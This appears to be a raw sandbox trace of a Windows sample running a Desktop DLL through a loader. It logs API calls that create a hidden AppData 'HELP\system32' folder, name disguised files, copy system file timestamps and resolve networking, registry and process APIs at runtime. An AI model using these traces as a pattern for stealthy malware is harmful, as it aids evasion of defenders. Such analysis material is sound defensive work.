[0030.978] GetLastError () returned 0x0 [0030.978] GetLastError () returned 0x0 [0030.978] GetLastError () returned 0x0 [0030.978] GetLastError () returned 0x0 [0030.978] GetLastError () returned 0x0 [0030.978] GetLastError () returned 0x0 [0030.978] GetLastError () returned 0x0 [0030.978] GetSystemDirectoryA (in: lpBuffer=0x72e0e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0030.978] wsprintfA (in: param_1=0x72e0e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0030.978] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72e0e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.978] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72e0e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.978] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72e0e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.978] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72e0e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0030.978] wsprintfA (in: param_1=0x72e0e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0030.979] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0030.979] wsprintfA (in: param_1=0x72e0e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0030.979] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0030.979] GetLastError () returned 0xb7 [0030.979] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72e0e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0030.979] wsprintfA (in: param_1=0x72e0e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0030.979] wsprintfA (in: param_1=0x72e0e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0030.979] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72e0e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0030.979] wsprintfA (in: param_1=0x24f260, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0030.979] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0030.979] wsprintfA (in: param_1=0x24f15c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0030.979] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0030.979] GetFileTime (in: hFile=0x74, lpCreationTime=0x72e0ec68, lpLastAccessTime=0x72e0ec70, lpLastWriteTime=0x72e0ec78 | out: lpCreationTime=0x72e0ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72e0ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72e0ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0030.979] CloseHandle (hObject=0x74) returned 1 [0030.979] GetLastError () returned 0x0 [0030.979] wsprintfA (in: param_1=0x72e0ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0030.979] GetLastError () returned 0x0 [0030.979] wsprintfA (in: param_1=0x72e0eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0030.980] GetSystemDirectoryA (in: lpBuffer=0x24f260, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0030.980] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0030.980] GetFileTime (in: hFile=0x74, lpCreationTime=0x72e1012c, lpLastAccessTime=0x72e10134, lpLastWriteTime=0x72e1013c | out: lpCreationTime=0x72e1012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72e10134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72e1013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0030.980] CloseHandle (hObject=0x74) returned 1 [0030.980] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0030.980] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0030.980] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0030.988] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0030.988] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0030.989] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0030.989] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0030.989] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0030.989] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0030.989] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0030.989] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0030.989] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0030.989] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0030.989] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0030.989] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0030.989] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0030.989] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0030.989] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0030.989] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0030.989] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0030.989] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0030.990] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0030.991] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0030.991] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0030.991] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0030.991] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0030.991] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0030.991] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0030.991] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0030.991] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0030.991] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0030.991] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0030.991] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0030.991] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0030.991] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0030.991] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0030.991] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0030.991] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0030.991] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0030.991] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0030.992] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0030.992] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0030.992] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0030.992] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0030.992] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0030.992] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0030.992] GetModuleFileNameA (in: hModule=0x72dd0000, lpFilename=0x72e0e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0030.992] GetModuleFileNameW (in: hModule=0x72dd0000, lpFilename=0x72e0e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0030.992] GetModuleFileNameA (in: hModule=0x72dd0000, lpFilename=0x72e0e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0030.992] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0030.994] HeapDestroy (hHeap=0x140000) returned 1 Process: id = "5" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f6a0" os_pid = "0xa7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllGetClassObject" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 333 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 334 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 335 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 336 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 337 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 338 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 339 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 340 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 341 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 342 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 343 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 344 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 345 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 346 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 347 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 348 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 349 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 350 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 351 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 352 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 353 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 354 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 355 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 356 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 357 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 358 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 359 start_va = 0x460000 end_va = 0x527fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 360 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 361 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 363 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 364 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 365 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 366 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 367 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 368 start_va = 0x72dd0000 end_va = 0x72e14fff entry_point = 0x72dd0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 369 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 370 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 372 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 373 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 374 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 375 start_va = 0xd0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 376 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Thread: id = 13 os_tid = 0xa80 [0030.917] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f5d4 | out: lpSystemTimeAsFileTime=0x26f5d4*(dwLowDateTime=0xe02591d0, dwHighDateTime=0x1d3dfba)) [0030.917] GetCurrentProcessId () returned 0xa7c [0030.917] GetCurrentThreadId () returned 0xa80 [0030.917] GetTickCount () returned 0x16e4c [0030.917] QueryPerformanceCounter (in: lpPerformanceCount=0x26f5cc | out: lpPerformanceCount=0x26f5cc*=358468879) returned 1 [0030.918] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.918] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0030.918] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0030.918] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0030.918] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0030.918] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.918] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.918] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.918] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.918] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.919] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.919] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.919] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.919] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.919] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.919] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.919] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.919] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.919] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.919] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.919] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0030.920] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.920] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0030.920] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.920] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.920] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0030.920] GetCurrentThreadId () returned 0xa80 [0030.920] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllGetClassObject" [0030.920] GetEnvironmentStringsW () returned 0x2b78a8* [0030.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0030.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x1409f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0030.920] FreeEnvironmentStringsW (penv=0x2b78a8) returned 1 [0030.920] GetStartupInfoA (in: lpStartupInfo=0x26f524 | out: lpStartupInfo=0x26f524*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0030.921] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0030.921] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0030.921] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0030.921] SetHandleCount (uNumber=0x20) returned 0x20 [0030.921] GetLastError () returned 0x0 [0030.921] SetLastError (dwErrCode=0x0) [0030.921] GetLastError () returned 0x0 [0030.921] SetLastError (dwErrCode=0x0) [0030.921] GetLastError () returned 0x0 [0030.921] SetLastError (dwErrCode=0x0) [0030.921] GetACP () returned 0x4e4 [0030.921] GetLastError () returned 0x0 [0030.921] SetLastError (dwErrCode=0x0) [0030.921] IsValidCodePage (CodePage=0x4e4) returned 1 [0030.921] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26f504 | out: lpCPInfo=0x26f504) returned 1 [0030.921] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26efd0 | out: lpCPInfo=0x26efd0) returned 1 [0030.921] GetLastError () returned 0x0 [0030.921] SetLastError (dwErrCode=0x0) [0030.921] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x26ef60 | out: lpCharType=0x26ef60) returned 1 [0030.921] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f3e4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0030.921] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f3e4, cbMultiByte=256, lpWideCharStr=0x26ed48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0030.921] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x26efe4 | out: lpCharType=0x26efe4) returned 1 [0030.921] GetLastError () returned 0x0 [0030.921] SetLastError (dwErrCode=0x0) [0030.921] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 